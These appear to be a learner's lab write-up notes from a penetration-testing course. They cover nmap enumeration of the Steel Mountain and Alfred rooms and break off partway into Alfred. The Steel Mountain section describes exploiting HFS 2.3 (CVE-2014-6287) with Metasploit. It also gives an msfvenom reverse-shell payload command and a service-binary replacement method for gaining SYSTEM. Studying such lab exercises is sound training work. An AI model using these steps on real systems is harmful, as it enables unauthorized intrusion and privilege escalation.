No matter where you are, the skills and requirements for a penetration tester will be the same. You’ll be required to have a good understanding of various aspects within information security including web applications, networks and sometimes even low level technology like assembly. A good understanding of these technologies is essential to learning how to exploit them.
The aim of this path is to make you ready for real world penetration testing by teaching you how to use industry standard tools along with a methodology to find vulnerabilities in machines. By the time you complete this path, you will be well prepared for interviews and jobs as a penetration tester. To complete this path you should have a basic to medium understanding of computing.
You can use this pathway to help you acquire the skills needed to go and get certified by well known certifiers in the security industry.
---
This contains a bunch of my notes that I wrote while taking this learning path.
## Getting Started
I had already completed this some time ago, it's actually pretty easy that I wont be writing about it , but I will think of writing somethings about it when I get free time, this is the first path, which had easy rooms and based on practicing on the areas :
1. Active Reconnaissance
2. Vulnerability Scanning
3. Privilege Escalation
4. Web Application Attacks
The rooms were:
1. Kenobi
2. Tutorial
3. Vulnversity
4. Blue
## Advanced Exploitation
### Steel Mountain
#### Enumeration
```
Nmap scan report for ip-10-10-156-16.eu-west-1.compute.internal (10.10.156.16)
Host is up (0.00052s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl Microsoft SChannel TLS
|_fingerprint-strings: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2022-07-08T18:03:59
|_Not valid after: 2023-01-07T18:03:59
|_ssl-date: 2022-07-09T18:06:49+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=7/9%Time=62C9C37D%P=x86_64-pc-linux-gnu%r(TLS
SF:SessionReq,346,"\x16\x03\x03\x03A\x02\0\0M\x03\x03b\xc9\xc3x\xa3\xa3\x1
SF:ax\xc5\xdd8\x86\xfb\xb6L\xcc=\x8b\*\xdf\x05\xab\x9f\xeais\xd5\[\x0f\x07
SF:\xf8\x98\x20\xae\x07\0\0\xec\n\x0e\xe0\x9aY\x93\xc2n\xc9v1d\x02QB\xf8w\
SF:xd2L\xd3\x15\xf2\x9a\xe4\xac\x02x\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\
SF:xe8\0\x02\xe5\0\x02\xe20\x82\x02\xde0\x82\x01\xc6\xa0\x03\x02\x01\x02\x
SF:02\x10W\*\xa5Gv\xc1\xfb\x88N%\xe5a\xb2\xdf\xd3\xcb0\r\x06\t\*\x86H\x86\
SF:xf7\r\x01\x01\x05\x05\x000\x181\x160\x14\x06\x03U\x04\x03\x13\rsteelmou
SF:ntain0\x1e\x17\r220708180359Z\x17\r230107180359Z0\x181\x160\x14\x06\x03
SF:U\x04\x03\x13\rsteelmountain0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x
SF:01\x01\x05\0\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\x9e\xe0\x
SF:c6\xac\xf7\xd0<J\xbc\*l\xe0\x7f\xe3\xe6\x98\xe29\x06\xcd\xceS\x8a5\xc1\
SF:xa5\)\xd0\xb1\x85O\xf78\xf8\xed\]\x83;\x1203\xddT!-\x9a\x1a\x19\xeb\$=\
SF:xdfA\xf9\x1c\x8e\x075m\xe4\x18\xfd42\x15SE\x94\xcfn4\"\xea\xff@Y\x9a\x1
SF:9\xecYx\x88\xca\|\xf47p{\x03\^\x13\xcd6x\x93\x03&\x17\xd4\xf3n\x8f\x1cw
SF:\x97\xc20\x7f\x99@\x87a\x0f\xcb\x7f6d\x13C\x0c\x99\xb6\xde}:\xf2\xd2\xe
SF:a\xe0\xf5\xe1\x93H\x8b\xc95\xa5\xbe\|\xec\xe9\x92\xb9h\xed\na\x1a\x12\x
SF:e0\xfe\\K\x04\x06`q:\xa7S%\x1d\xa2!q\x02p\)\xe7r\xd4d4e\)04\xbaO\x05\xa
SF:7\xf0:\xc2\xbb\x81\x12\xa3b\x006n\xdd\xb8\x0b\\x\+\xa3\x04\xfaV\x0b\)\x
SF:0f\xc4\x9b\xf3\x18\$\xe5\n\xac\xbd\xcd\)\xc9\xed\x1d\?\xa1\xed\xc8\^wx\
SF:xbdV\xb2ST\x9c\x13C\?\x0b_\x987\x1d\x96\xe3\]\x81z1\xf1_\xe5\x7fCP1\x1f
SF:\x87\xcf\x02\x03\x01\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x
SF:08\+\x06\x01\x05\x05\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\
SF:x0400\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0\x8d\
SF:xf5'\)\x9b\x14\x8b\xa7\xaa\x19Zg\xe9\x82\x17\^\x88m\x99\x02\xfe\xbc\x91
SF:\x80\xce\xc6\xbe\xfaI,\x07\xdd\x07\n\xd5\x90G\x95!\x05\xc0\x06llj\xf0\x
SF:bbq\xa9m#\x13!\x89\xc4\xed\xb3Q\x8c\xb7\x86r_{We\x03\xebL\xe49<\xe6\xff
SF:\x19\x07HW\x12\x97\x83\xf0\x9chgj\xcd!\x02\xcbz\xd4\x82\xb2\x9aA\xf0\x8
SF:c&\(\x85I\x12\x03!\xa7\x89\xf8\x86e\x9a\xea_\^\xc3\^fq\xcc\x96l\xb9\xdd
SF:n\x02<;\x17\x10\xe0\x82\x1d\xed\xc5\xd8\xc9\xe8\xcf\x19O\xac\xde\xd6\xe
SF:c\xf4eP-\xdc\x91\x98\x1b7Ll\xa5\xba\x8bgp%k\x85\n\xbfs\xd9q\xe62\xdc%\x
SF:d7\x8f:\0\x9eN\x1d3tzL-7\x95>\x9f\xa4'\xac\+=\xb6\x15\x10Z\xa5\xd8q\x9a
SF:\x92,\x97\xb4\xdc<2\x0e8\xf2ZM\xaaZ\xd0\^\xc8<\x01\x16\xaa\]y\x95\xceG\
SF:xd1\x7ft;;\xe8tS\xdc\+\0\x01\xcd\x07\x9c\x14M\xaa\x1f\xbc}\xf5\xe2\xd7J
SF:\xad\xef\xe68\x0e\0\0\0");
MAC Address: 02:66:B3:26:00:81 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/9%OT=80%CT=1%CU=35918%PV=Y%DS=1%DC=D%G=Y%M=0266B3%TM
OS:=62C9C3BE%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=I%CI=I%TS=7)
OS:SEQ(SP=105%GCD=1%ISR=106%TI=I%CI=RD%II=I%SS=S%TS=7)SEQ(SP=105%GCD=1%ISR=
OS:106%TI=I%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2
OS:301NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2
OS:000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=
OS:Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%R
OS:D=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:66:b3:26:00:81 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-09 19:06:50
|_ start_date: 2022-07-09 19:03:52
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms ip-10-10-156-16.eu-west-1.compute.internal (10.10.156.16)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.90 seconds
```
I notice the server type which is windows server 2008 R2. I also noticed HttpFileServer 2.3 running on port `8080` and we also have port `80` running with a normal web server.
opening Port 80 on the browser
It displays an image of the employer of the month which is the answer of the first question of the room , but we do not know the name of the employee we just have the image so I viewed the source code of the website and I was able to get the link to the image which contained the name of the employee as the file name for the image :
`http://10.10.156.16/img/BillHarper.png`
And there we have it the answer for the Introduction part is `Bill Harper`
The other question on the Initial Access part asks about the other port running a webserver and that is port 8080 I decided to take a deep look to it
I decide to take a look on exploit-db and see if there is any vulnerability disclosed on the version of the service running on port 8080
Fortunately we have `Arbitrary file upload` and `Remote Command Execution` which can be achieved after `Arbitrary file upload`
#### Initial FootHold
The CVE for the vulnerability to be exploited is : `CVE-2014-6287`
I use a metasploit module to exploit this vulnerability. And I was able to get shell as user `bill`
The flag for user is found in `C:\Users\bill\`
#### Privilege Escalation [With Metasploit]
For the privilege escalation part , the room gives a brief explanation on privilege escalation and the use of `PowerUp.ps1`
We can now see that CanRestart Option is set to true on AdvancedSystemCare 9 software that is running:
which means we can replace the legitimate application with a malicious one then restart the service which will run our malicious program providing us with a reverse shell
I first used metasploit to create a payload with the command `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=1234 -f exe -o Advanced.exe`
and then from the session I open shell and stop the service with the command `sc stop AdvancedSystemCareService9` and then close the shell then upload the file `Advanced.exe` to `/Program Files (x86)/IObit/Advanced SystemCare/ASCService.exe` .
I open up another terminal I set a listener , and I get back to my session open shell and restart the service with the command `sc start AdvancedSystemCareService9`
The root flag is in `C:\Users\Administrator\Desktop\root.txt`
#### Privilege Escalation [Without Metasploit]
You can use an automated script or you can use winpeas to discover detailed information about the services running and the users and the whole system.
### Alfred
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
#### Enumeration
First did nmap scan to know what ports are open and what services are running on the ports.
```
Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-10 19:56 BST
Nmap scan report for ip-10-10-67-79.eu-west-1.compute.internal (10.10.67.79)
Host is up (0.00042s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-07-09T18:54:41
|_Not valid after: 2023-01-08T18:54:41
|_ssl-date: 2022-07-10T18:56:36+00:00; 0s from scanner time.
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 02:CC:15:48:C3:93 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms ip-10-10-67-79.eu-west-1.compute.internal (10.10.67.79)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.62 seconds
```
To answer the first question we have 3 ports opened. Port 80 is running with IIS web server and port 8080 is running with Jetty . These two are the only ports that caught my attention.
Exploring port 80, I was able to get a hint on what the username of one of the users in the system might be
And that is `alfred` .
---
**WILL CONTINUE THE NOTES SOON**
Sign in with Wallet
Connect another wallet